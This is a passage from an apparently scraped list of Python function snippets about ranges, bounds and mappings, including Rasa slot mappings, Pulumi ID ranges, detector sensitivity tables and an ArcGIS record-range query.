{}\n s = pd.Series(entitytype_arr)\n for name, group in s.groupby(s):\n etype_2_minmax_funcEnum[name] = (min(group.index), max(group.index))\n return etype_2_minmax_funcEnum", "def get_limits(age_groups):\n\n limits = {}\n for data in age_groups:\n pattern = re.compile(r'([\\d]+)-([\\d]+)')\n match = pattern.search(data)\n age_min = int(match.group(1).strip())\n age_max = int(match.group(2).strip())\n # print(f'limits = {age_min} to {age_max}')\n limits[f'Age_{data}'] = [age_min, age_max]\n return limits", "def range_dic_(df_):\n range_dic = {}\n for man in df_['maneuver']:\n trial_indx = df_.index[df_['maneuver'] == man].tolist()\n range_ = (min(trial_indx), max(trial_indx))\n range_dic.update({man: range_})\n return range_dic", "def range_dic_(df_):\n range_dic = {}\n for man in df_['maneuver']:\n trial_indx = df_.index[df_['maneuver'] == man].tolist()\n range_ = (min(trial_indx), max(trial_indx))\n range_dic.update({man: range_})\n return range_dic", "def _calc_range(self) -> np.ndarray:\n if self._is_ct25k():\n range_resolution = 30\n n_gates = 256\n else:\n n_gates = int(self.metadata[\"number_of_gates\"])\n range_resolution = int(self.metadata[\"range_resolution\"])\n return np.arange(n_gates) * range_resolution + range_resolution / 2", "def define_range():\n\n def_range = {'lt': [0.0, 24.0],\n 'lon': [0.0, 360.0],\n 'angle': [0.0, 2.0 * np.pi]}\n\n return def_range", "def test_get_meta_range(self):\n pass", "def getRangeMM(self) -> float:\n ...", "def get_range_info(self):\n with open(self.range_path, 'r') as _file:\n for line in _file.readlines():\n list0 = line.strip().split('-')\n range_dict = {\n 'min': int(list0[0], 16),\n 'max': int(list0[1], 16),\n 'max_offset': int(list0[1], 16) - int(list0[0], 16),\n }\n self.ranges.append(range_dict)", "def _get_energy_range(self):\n\n e0_min = self.network.isomers[0].E0\n e0_max = e0_min\n\n for isomer in self.network.isomers[1:]:\n E0 = isomer.E0\n if E0 < e0_min:\n e0_min = E0\n if E0 > e0_max:\n e0_max = E0\n for reactant in self.network.reactants:\n E0 = reactant.E0\n if E0 < e0_min:\n e0_min = E0\n if E0 > e0_max:\n e0_max = E0\n for product in self.network.products:\n E0 = product.E0\n if E0 < e0_min:\n e0_min = E0\n if E0 > e0_max:\n e0_max = E0\n for rxn in self.network.path_reactions:\n E0 = rxn.transition_state.conformer.E0.value_si\n if E0 < e0_min:\n e0_min = E0\n if E0 > e0_max:\n e0_max = E0\n\n return e0_min, e0_max", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n # type: () -> Dict[Text: Union[Dict, List[Dict]]]\n return {\n \"numero_prendas\": [\n self.from_entity(entity=\"number\"),\n\n ]\n }", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n # type: () -> Dict[Text: Union[Dict, List[Dict]]]\n return {\n \"numero_prendas\": [\n self.from_entity(entity=\"number\"),\n\n ]\n }", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n\n return {\n \"product\": [\n self.from_entity(entity=\"product\", intent=[\"inform\"]),\n ],\n \"applicant_name\": [\n self.from_entity(entity=\"applicant_name\", intent=[\"inform\"]),\n ],\n \"applicant_dob\": [\n self.from_entity(entity=\"applicant_dob\", intent=[\"inform\"]),\n ],\n \"applicant_phoneno\": [\n self.from_entity(entity=\"applicant_phoneno\", intent=[\"inform\"]),\n ],\n \"applicant_address\": [\n self.from_entity(entity=\"applicant_address\", intent=[\"inform\"]),\n ]\n }", "def map_range( self, rng ):\n rmap = {\n '2 nA': pac.Ammeter.CurrentRange.N2,\n '20 nA': pac.Ammeter.CurrentRange.N20,\n '200 nA': 
pac.Ammeter.CurrentRange.N200,\n '2 uA': pac.Ammeter.CurrentRange.U2,\n '20 uA': pac.Ammeter.CurrentRange.U20,\n '200 uA': pac.Ammeter.CurrentRange.U200,\n '2 mA': pac.Ammeter.CurrentRange.M2,\n '20 mA': pac.Ammeter.CurrentRange.M20\n }\n \n if rng in rmap:\n return rmap[ rng ]\n \n else:\n raise ValueError( 'Invalid range' )", "def _part_group_cell_mapper(bd_type):\n js, iss = np.meshgrid(range(smt.cols), range(smt.rows)) # zero indexed to agree with python interpretation\n idx = bd_type.flatten() != -1\n out = dict(zip(range(1, idx.sum() + 1), list(zip(iss.flatten()[idx], js.flatten()[idx]))))\n return out", "def get_range(self):\n classes = concrete_descendents(self.class_)\n d=dict([(name,class_) for name,class_ in classes.items()])\n if self.allow_None:\n d['None']=None\n return d", "def compute_bounds(self, space):\n bounds = np.zeros((len(space), 2))\n\n for idx, param in enumerate(space):\n\n if TYPE[param[\"type\"]] is TYPE.FLOAT or \\\n TYPE[param[\"type\"]] is TYPE.INTEGER:\n bounds[idx] = (param[\"min\"], param[\"max\"])\n\n elif TYPE[param[\"type\"]] is TYPE.DISCRETE or \\\n TYPE[param[\"type\"]] is TYPE.DISCRETE:\n bounds[idx] = (0, len(param['values']))\n\n return bounds", "def _get_area_incmfd_attr(max_np, max_hd, max_bins):\n\n att = []\n att.append({'name': 'src_id', 'type': 'String', 'len': 10})\n att.append({'name': 'src_name', 'type': 'String', 'len': 30})\n att.append({'name': 'tect_reg', 'type': 'String', 'len': 30})\n att.append({'name': 'upp_seismo', 'type': 'Real'})\n att.append({'name': 'low_seismo', 'type': 'Real'})\n att.append({'name': 'mag_scal_r', 'type': 'String', 'len': 15})\n att.append({'name': 'rup_asp_ra', 'type': 'Real'})\n att.append({'name': 'mfd_type', 'type': 'String', 'len': 20})\n\n att.append({'name': 'min_mag', 'type': 'Real'})\n att.append({'name': 'bin_width', 'type': 'Real'})\n att.append({'name': 'num_bins', 'type': 'Integer'})\n for i in range(1, max_bins+1):\n lab = 'or_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n\n att.append({'name': 'num_npd', 'type': 'Integer'})\n for i in range(1, max_np+1):\n lab = 'weight_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n lab = 'strike_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n lab = 'rake_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n lab = 'dip_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n\n att.append({'name': 'num_hdd', 'type': 'Integer'})\n for i in range(1, max_hd+1):\n lab = 'hdd_d_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n lab = 'hdd_w_%d' % (i)\n att.append({'name': lab, 'type': 'Real'})\n\n return att", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n\n return {\n \"search_type\": [\n self.from_trigger_intent(\n intent=\"search_transactions\", value=\"spend\"\n ),\n self.from_trigger_intent(\n intent=\"check_earnings\", value=\"deposit\"\n ),\n ],\n \"time\": [\n self.from_entity(entity=\"time\"),\n ]\n }", "def _get_entity_mappings(query_list: ProcessedQueryList) -> Dict:\n entity_labels = set()\n logger.info(\"Generating Entity Labels...\")\n for d, i, entities in zip(\n query_list.domains(), query_list.intents(), query_list.entities()\n ):\n if len(entities):\n for entity in entities:\n e = str(entity.entity.type)\n entity_labels.add(f\"{d}.{i}.B|{e}\")\n entity_labels.add(f\"{d}.{i}.I|{e}\")\n entity_labels.add(f\"{d}.{i}.S|{e}\")\n entity_labels.add(f\"{d}.{i}.E|{e}\")\n\n e = \"O|\"\n entity_labels.add(f\"{d}.{i}.{e}\")\n\n entity_labels = sorted(list(entity_labels))\n return dict(zip(entity_labels, 
range(len(entity_labels))))", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n\n return {\n \"amount_of_money\": [\n self.from_entity(entity=\"amount-of-money\"),\n self.from_entity(entity=\"number\"),\n ],\n \"confirm\": [\n self.from_intent(value=True, intent=\"affirm\"),\n self.from_intent(value=False, intent=\"deny\"),\n ],\n }", "def range_params(self, ran, kw):\n specs = {\"range\": (SchemaNode(\"value\"),\n SchemaNode(\"param\").set_attr(\"name\",\"minInclusive\"),\n SchemaNode(\"param\").set_attr(\"name\",\"maxInclusive\")),\n \"length\": (SchemaNode(\"param\").set_attr(\"name\",\"length\"),\n SchemaNode(\"param\").set_attr(\"name\",\"minLength\"),\n SchemaNode(\"param\").set_attr(\"name\",\"maxLength\"))}\n (exact, min_, max_) = specs[kw]\n if (len(ran) == 1 or ran[0] == ran[1]) and ran[0][0] != \"m\":\n elem = exact\n elem.text = ran[0]\n return [elem]\n res = []\n if ran[0][0] != \"m\":\n elem = min_\n elem.text = ran[0]\n res.append(elem)\n if ran[1][0] != \"m\":\n elem = max_\n elem.text = ran[1]\n res.append(elem)\n return res", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n\n return {\n \"bug\":[self.from_entity(\n entity=\"bug\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"beverage\": [self.from_entity(\n entity=\"beverage\", \n intent=\"inform\"), \n self.from_text(\n intent=\"inform\")],\n \"second_person_plural\": [self.from_entity(\n entity=\"second_person_plural\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"cot_caught\": [self.from_entity(\n entity=\"cot_caught\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"rain_sun\": [self.from_entity(\n entity=\"rain_sun\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"crawfish\": [self.from_entity(\n entity=\"crawfish\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"halloween\": [self.from_entity(\n entity=\"halloween\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"sandwich\": [self.from_entity(\n entity=\"sandwich\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"side_road\": [self.from_entity(\n entity=\"side_road\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"shoes\": [self.from_entity(\n entity=\"shoes\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"highway\": [self.from_entity(\n entity=\"highway\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"yard_sale\": [self.from_entity(\n entity=\"yard_sale\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"rubbernecking\": [self.from_entity(\n entity=\"rubbernecking\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"frosting\": [self.from_entity(\n entity=\"frosting\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"lawyer\": [self.from_entity(\n entity=\"lawyer\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"kitty_corner\": [self.from_entity(\n entity=\"kitty_corner\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"firefly\": [self.from_entity(\n entity=\"firefly\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"verge\": [self.from_entity(\n entity=\"verge\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"brew_thru\": [self.from_entity(\n entity=\"brew_thru\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"water_fountain\": [self.from_entity(\n 
entity=\"water_fountain\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")]\n }", "def test_get_range(self):\n pass", "def scan_range(self, obj):\n detect_minmax = []\n for item in self._category:\n cat = item.replace(' ', '')\n has_minmax = False\n for k, v in obj.items():\n has_minmax = has_minmax or isinstance(v.get(cat), dict)\n in_k, in_v = list(v.items())[-1]\n while not isinstance(in_v, str):\n has_minmax = has_minmax or isinstance(v.get(cat), dict)\n in_k, in_v = list(in_v.items())[-1]\n \n if has_minmax:\n detect_minmax.append('Min ' + item)\n detect_minmax.append('Max ' + item)\n else:\n detect_minmax.append(item)\n \n self._category_aux = detect_minmax\n for c in self._category_aux:\n self._data[c] = []", "def get_allowed_ranges(csvfile):\n from csv import DictReader\n ranges = {}\n with open(csvfile, 'r') as infile:\n # Remove spaces from field headers\n firstline = infile.readline()\n headers = [k.strip() for k in firstline.split(',')]\n if not len(headers) == 11:\n headers = [k.strip() for k in firstline.split(' ')]\n opfield = 'CSVv2;OperatingPoint'\n if not opfield in headers: opfield = 'cMVAv2;OperatingPoint'\n if not opfield in headers: opfield = 'CSV;OperatingPoint'\n\n reader = DictReader(infile, fieldnames=headers)\n for row in reader:\n key = (int(row[opfield].strip()),\n row['measurementType'].strip(),\n row['sysType'].strip(),\n int(row['jetFlavor'].strip()))\n ranges.setdefault(key, {})\n for var in ['eta', 'pt', 'discr']:\n mini = float(row['%sMin'%var].strip())\n maxi = float(row['%sMax'%var].strip())\n ranges[key]['%sMin'%var] = min(ranges[key].setdefault('%sMin'%var, mini), mini)\n ranges[key]['%sMax'%var] = max(ranges[key].setdefault('%sMax'%var, maxi), maxi)\n return ranges", "def area(minRA, maxRA, minDec, maxDec):\n\n return dict(zip(['minRA', 'maxRA', 'minDec', 'maxDec'], [minRA, maxRA, minDec, maxDec]))", "def _get_range(self):\n return tuple((0, m, 1) for m in self.level_shapes[0])", "def summarize_ranges(self, ranges):\n if len(ranges) == 0: return []\n min_ = 'min'\n max_ = 'max'\n for r in ranges:\n if r[0][0] == \"min\":\n r[0][0] = min_\n else:\n min_ = r[0][0]\n if r[-1][1] == \"max\":\n r[-1][1] = max_\n else:\n max_ = r[-1][1]\n return ranges[-1]", "def get_gnid_range_map(node_tids):\n ntypes_gid_range = {}\n offset = 0\n for k, v in node_tids.items():\n ntypes_gid_range[k] = [offset + int(v[0][0]), offset + int(v[-1][1])]\n offset += int(v[-1][1])\n\n return ntypes_gid_range", "def merge_ranges():", "def generate_var_ranges(self):\n\n var_ranges = {}\n for var in self.variables:\n min_to_max = list(range(int(var['min']), int(var['max']) + 1))\n if (var['zero_ok'] == False and 0 in min_to_max):\n min_to_max.remove(0)\n\n var_ranges[var['variable']] = min_to_max\n\n return var_ranges", "def create_dict(list, old_min, old_max, new_min, new_max):\n d = {}\n for row in list:\n tds = row.find_all(\"td\")\n letter = tds[0].string\n freq = tds[1].string[:-1]\n freq = float(freq.replace(',', '.'))\n d[letter] = map_to_range(freq, old_min, old_max, new_min, new_max)\n\n return d", "def get_idranges(names, counts, num_chunks=None):\n gnid_start = 0\n gnid_end = gnid_start\n tid_dict = {}\n gid_dict = {}\n\n for idx, typename in enumerate(names):\n gnid_end += counts[typename]\n tid_dict[typename] = [[0, counts[typename]]]\n gid_dict[typename] = np.array([gnid_start, gnid_end]).reshape([1, 2])\n gnid_start = gnid_end\n\n return tid_dict, gid_dict", "def get_ranges(self, tchain, kw):\n (lo, hi) = (\"min\", \"max\")\n ran = None\n for t in 
tchain:\n rstmt = t.search_one(kw)\n if rstmt is None: continue\n ran = [ i.split(\"..\") for i in rstmt.arg.split(\"|\") ]\n if ran[0][0] != 'min': lo = ran[0][0]\n if ran[-1][-1] != 'max': hi = ran[-1][-1]\n if ran is None: return None\n if len(ran) == 1:\n return [(lo, hi)]\n else:\n return [(lo, ran[0][-1])] + ran[1:-1] + [(ran[-1][0], hi)]", "def _example_parser(range_val: int) -> Dict[str, tf.Tensor]:\n image = tf.random.stateless_categorical(\n tf.math.log([[0.5, 0.5]]), np.prod(self._image_shape),\n [self._split_seed[split], self._split_seed[split] + range_val],\n dtype=tf.int32)\n image = tf.reshape(tf.cast(image, tf.float32), self._image_shape)\n image = 2.0 * (image - 0.5)\n label = tf.zeros([], tf.int32)\n return {\"features\": image, \"labels\": label}", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def get_range(self):\n # CEBHACKALERT: was written assuming it would only operate on\n # Parameterized instances. Think this is an sf.net bug/feature\n # request. Temporary fix: don't use obj.name if unavailable.\n try:\n d=dict([(obj.name,obj) for obj in self.objects])\n except AttributeError:\n d=dict([(obj,obj) for obj in self.objects])\n return d", "def findRanges(data_grouped):\n ranges = []\n for i in data_grouped.columns:\n theRange = (data_grouped[i].min(), data_grouped[i].max())\n ranges.append(theRange)\n return ranges", "def value_ranges(self, attributes):\n ranges = []\n for attribute in attributes:\n if not attribute.is_continuous():\n raise inv.InvalidDataError('Cannot discretise non continuous attribute ' + attribute.name)\n values = self.values_grouped_by_attribute(attributes)\n for value in values: #each entry in values is the range of values for a particular attribute\n value.sort()\n ranges.append(r.Range(value[0], value[-1], True))\n return ranges", "def base_mappings():\n return {\n 'from_1': {\n 'to_1': {\n 'mol_1': ({}, {}, []),\n 'mol_2': ({}, {}, []),\n },\n },\n }", "def _example_parser(range_val: int) -> Dict[str, tf.Tensor]:\n image = tf.random.stateless_normal(\n self._image_shape,\n [self._split_seed[split], self._split_seed[split] + range_val],\n dtype=tf.float32)\n image_min = tf.reduce_min(image)\n image_max = tf.reduce_max(image)\n # Normalize the values of the image to be in [-1, 1].\n image = 2.0 * (image - image_min) / (image_max - image_min) - 1.0\n label = tf.zeros([], tf.int32)\n return {\"features\": image, \"labels\": label}", "def range_8(configuration):\n range_dict_all = {\n # updated aLIGO design sensitivity range from 197.5 to 181.5 Mpc on 9 Apr 2018 to reflect T1800044-v4\n \"HL\" : {'H1' : 181.5, 'L1' : 181.5},\n \"HLV\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3 },\n \"HLVK\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, 'K1' : 160.0},\n \"HLVKI\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, 'K1' : 160.0, 'I1' : 181.5},\n \"GW170817\" : {'H1': 107/2.26 *1.26 , 'L1': 218/2.26, 'V1': 58/2.26}, # 1.26 is the improvement factor for H1's range due to data processing.\n \"GW170817_without_Virgo\" : {'H1': 107/2.26 *1.26 , 'L1': 218/2.26},\n \"GW170814\" : {'H1': 53, 'L1': 98, 'V1': 26}, # 1.26 is 
the improvement factor for H1's range due to data processing.\n \"design\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3 },\n \"early\" : {'H1' : 60., 'L1': 60.},\n \"half_ligo\" : {'H1' : 99, 'L1' : 99, 'V1': 128.3 },\n \"half_virgo\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 64 },\n \"nosrm\" : {'H1' : 159, 'L1' : 159, 'V1': 109 },\n \"india\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, \"I1\" : 181.5 },\n \"kagra\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, \"I1\" : 181.5 , \\\n \"K1\" : 160.0},\n \"bala\" : {'H1' : 181.5, 'H2' : 181.5, 'L1' : 181.5, 'V1': 128.3, \\\n \"I1\" : 181.5 , \"K1\" : 160.0},\n \"sa\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, \"I1\" : 181.5 , \\\n \"K1\" : 160.0, \"S1\":181.5},\n \"sa2\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, \"I1\" : 181.5 , \\\n \"K1\" : 160.0, \"S1\":181.5},\n \"steve\" : {'H1' : 160.0, 'L1' : 160.0, 'V1': 160.0, \"I1\" : 160.0 },\n \"s6vsr2\" : {'H1' : 20., 'L1' : 20., 'V1': 8. }\n }\n return(range_dict_all[configuration])", "def get_bounds():\n return [0.00], [1.00]", "def planets_in_range(self):\n\n query_string = \"SELECT * from planets_in_range;\"\n\n # Perform query\n self.conn_cur.execute(query_string)\n results = self.conn_cur.fetchall()\n\n # Build dictionary\n ranges = {}\n for row in results:\n ranges[row[0]] = row[1]\n\n return ranges", "def getAFeRange(brand):\n return afe_range[brand]", "def get_range(self) -> tuple[int, int]:\n return self.range_from, self.range_to", "def init_range_variables(self):\n self.range_start_vars_array = []\n self.range_end_vars_array = []\n\n for idx in range(len(self._pk_for_filter)):\n self.range_start_vars_array.append(\"@range_start_{}\".format(idx))\n self.range_end_vars_array.append(\"@range_end_{}\".format(idx))\n self.range_start_vars = \",\".join(self.range_start_vars_array)\n self.range_end_vars = \",\".join(self.range_end_vars_array)", "def ranges(self):\n return self._ranges", "def range_table(self):\n range_table_base = []\n if self.block_mask != None:\n range_table_length = len(self.block_mask)\n else:\n range_table_length = self.block_num\n\n for i in range(range_table_length):\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.k_size))\n range_table_base.append(len(self.pool_type))\n\n return range_table_base", "def getMassRange(brand):\n return mass_range[brand]", "def input_definition(self):\n return {\n 'incline1': [-MAX_ANGLE, MAX_ANGLE],\n 'incline2': [-MAX_ANGLE, MAX_ANGLE],\n 'incline3': [-MAX_ANGLE, MAX_ANGLE],\n 'incline4': [-MAX_ANGLE, MAX_ANGLE],\n 'incline5': [-MAX_ANGLE, MAX_ANGLE]\n }", "def getAgeRange(brand):\n from numpy import arange, append\n \n # search dictionary for tuple containing age limits (min, max, delta)\n #age_limits = age_range[brand]\n \n # hard code age range properties (temporary)\n if brand in ['Lyon', 'Lyon10', 'Lyon19']:\n ages = 10.0**arange(6.0, 10.1, 0.1)\n elif brand in ['DMESTAR', 'DSEP14', 'DSEP08', 'DSEP']:\n ages = arange(1.0e6, 20.0e6, 1.0e5) \n ages = append(ages, arange(2.0e7, 1.001e8, 5.0e6))\n elif brand in ['Pisa']:\n ages = arange(1.0e6, 20.0e6, 1.0e6)\n ages = append(ages, arange(2.0e7, 1.001e8, 5.0e6))\n elif brand in ['Yale', 'Yale13', 'BAton']:\n ages = arange(1.0e6, 2.0e7, 2.0e5)\n ages = append(ages, 
arange(2.0e7, 1.0e8, 5.0e6))\n else:\n ages = 0.0\n \n return ages", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangePatchArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangePatchArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangePatchArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangePatchArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def dict_time(self, workspace_unique_id=None, subset_unique_id=None, request=None):\n workspace_object = self._get_workspace_object(unique_id=workspace_unique_id) \n subset_object = workspace_object.get_subset_object(subset_unique_id) \n if not subset_object:\n self._logger.warning('Could not find subset object {}. Subset is probably not loaded.'.format(subset_unique_id))\n return {}\n\n data_filter_object = subset_object.get_data_filter_object('step_1')\n if request:\n data_filter_object.set_filter(filter_type='include_list', \n filter_name='MYEAR', \n data=request['year_range'])\n# data_filter_object.set_filter(filter_type='include_list', \n# filter_name='MONTH', \n# data=request['month_list'])\n \n else:\n year_list = sorted(map(int, data_filter_object.get_include_list_filter('MYEAR')))\n# month_list = sorted(map(int, data_filter_object.get_include_list_filter('MONTH')))\n \n return {\"year_range\": [year_list[0], year_list[-1]]}#, \"month_list\": month_list}", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n\n return {\n \"payment_amount\": [\n self.from_entity(entity=\"payment_amount\"),\n self.from_entity(entity=\"amount-of-money\"),\n self.from_entity(entity=\"number\"),\n ],\n \"confirm\": [\n self.from_intent(value=True, intent=\"affirm\"),\n self.from_intent(value=False, intent=\"deny\"),\n ],\n }", "def get_valid_values_map(self, condition=True):\n tpninfos = self.locate.get_all_tpninfos(self.instrument, self.filekind, \"ld_tpn\")\n required_keys = self.get_required_parkeys()\n valid_values = {}\n for info in tpninfos:\n if info.is_complex_constraint:\n continue\n if info.name in required_keys:\n values = info.values\n if len(values) == 1 and \":\" in values[0]:\n limits = values[0].split(\":\")\n try:\n limits = [int(float(x)) for x in limits]\n except Exception:\n pass\n # sys.exc_clear()\n else:\n values = list(range(limits[0], limits[1]+1))\n if condition:\n values = tuple([utils.condition_value(val) for val in values])\n valid_values[info.name] = values\n return valid_values", "def get_recordrange(self):\r\n if self.version >= 10.1:\r\n querystr = \"\"\"?where=&outFields=*&returnGeometry=false&returnIdsOnly=false&returnCountOnly=false&orderByFields=&groupByFieldsForStatistics=&outStatistics=[{%0D%0A++++\"statisticType\"%3A+\"count\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidcount\"%0D%0A++}%2C{%0D%0A++++\"statisticType\"%3A+\"min\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidmin\"%0D%0A++}%2C{%0D%0A++++\"statisticType\"%3A+\"max\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidmax\"%0D%0A++}]&returnZ=false&returnM=false&returnDistinctValues=false&f=pjson\"\"\"\r\n req = requests.get(self.endpointurl + querystr)\r\n self.recordinfo = req.json()[\"features\"][0][\"attributes\"]\r\n\r\n elif self.version < 10.1:\r\n querystr = 
\"\"\"?text=&geometry=&geometryType=esriGeometryPoint&inSR=&spatialRel=esriSpatialRelIntersects&relationParam=&objectIds=&where=objectid+>+-1&time=&returnCountOnly=true&returnIdsOnly=false&returnGeometry=false&maxAllowableOffset=&outSR=&outFields=&f=pjson\"\"\"\r\n req = requests.get(self.endpontquerystr + qs)\r\n self.recordinfo = {\"oidmin\": 0, \"oidmax\": req.json()[\"count\"]}\r\n\r\n [\r\n self.iterlist.append([x, x + 999])\r\n for x in range(\r\n self.recordinfo[\"oidmin\"]\r\n if self.recordinfo[\"oidmin\"] != self.recordinfo[\"oidmax\"]\r\n else 1 - self.recordinfo[\"oidmin\"],\r\n self.recordinfo[\"oidmax\"],\r\n 1000,\r\n )\r\n ]", "def get_price_range_map(data_map):\n res_map = defaultdict(lambda: deepcopy(static_constants.UNIT_PRICE_DEFAULT))\n for key, list_of_price in data_map.items():\n list_of_price.sort()\n lower_price = np.percentile(list_of_price, 40)\n higher_price = np.percentile(list_of_price, 70)\n median_price = np.percentile(list_of_price, 50)\n res_map[key] = {'lower_price': lower_price, 'median_price': median_price, 'higher_price': higher_price}\n return res_map", "def cal(num1, num2, range):\r\n setup(range)\r\n return Andcollections(num1, num2)", "def process_primary_inputs(dict_):\n try:\n dict_[\"ESTIMATION\"][\"bins\"]\n except KeyError:\n bins = 25\n else:\n bins = dict_[\"ESTIMATION\"][\"bins\"]\n\n try:\n dict_[\"ESTIMATION\"][\"logit\"]\n except KeyError:\n logit = True\n else:\n logit = dict_[\"ESTIMATION\"][\"logit\"]\n\n try:\n dict_[\"ESTIMATION\"][\"bandwidth\"]\n except KeyError:\n bandwidth = 0.32\n else:\n bandwidth = dict_[\"ESTIMATION\"][\"bandwidth\"]\n\n try:\n dict_[\"ESTIMATION\"][\"gridsize\"]\n except KeyError:\n gridsize = 500\n else:\n gridsize = dict_[\"ESTIMATION\"][\"gridsize\"]\n\n try:\n dict_[\"ESTIMATION\"][\"ps_range\"]\n except KeyError:\n prop_score_range = [0.005, 0.995]\n else:\n prop_score_range = dict_[\"ESTIMATION\"][\"ps_range\"]\n\n start_grid = prop_score_range[0]\n endgrid = prop_score_range[1]\n\n return bins, logit, bandwidth, gridsize, start_grid, endgrid", "def m_to_range(self, data):\n return (data - self._min_range_m) / self._total_range", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n # type: () -> Dict[Text: Union[Dict, List[Dict]]]\n return {\n \"fecha_hora\": [\n self.from_entity(entity=\"time\"),\n\n ]\n }", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n # type: () -> Dict[Text: Union[Dict, List[Dict]]]\n return {\n \"fecha_hora\": [\n self.from_entity(entity=\"time\"),\n\n ]\n }", "def get_input_voltage_ranges(self):\r\n bufsize = 32\r\n range_list_type = cfloat64 * bufsize\r\n range_list = range_list_type()\r\n NIDAQ_dll.DAQmxGetDevAIVoltageRngs(self.dev_id.encode('ascii'),\r\n ctypes.byref(range_list), uInt32(bufsize))\r\n range_list = list(range_list)\r\n range_values_n = range_list.index(0.0)\r\n range_n = range_values_n / 2\r\n return_list = []\r\n for idx in range(range_n):\r\n return_list.append([range_list[2*idx],\r\n range_list[(2*idx)+1]]) \r\n return return_list", "def emb(self, entity):\n fv = []\n # fv.append(self.sum_pw(entity))\n fv.append(self.avg_pw(entity))\n fv.append(self.min_pw(entity))\n fv.append(self.max_pw(entity))\n fv.append(self.my_pw(entity))\n fv.append(self.min_e_score(entity))\n fv.append(self.max_e_score(entity))\n fv.append(self.avg_e_score(entity))\n # fv.append(self.new_edges(entity)) # only comes into play for regress.\n return fv", "def possible_vals(pp):\n\n if pp[\"type\"] == \"w\":\n vals = [0, pp[\"pmax\"]]\n\n elif 
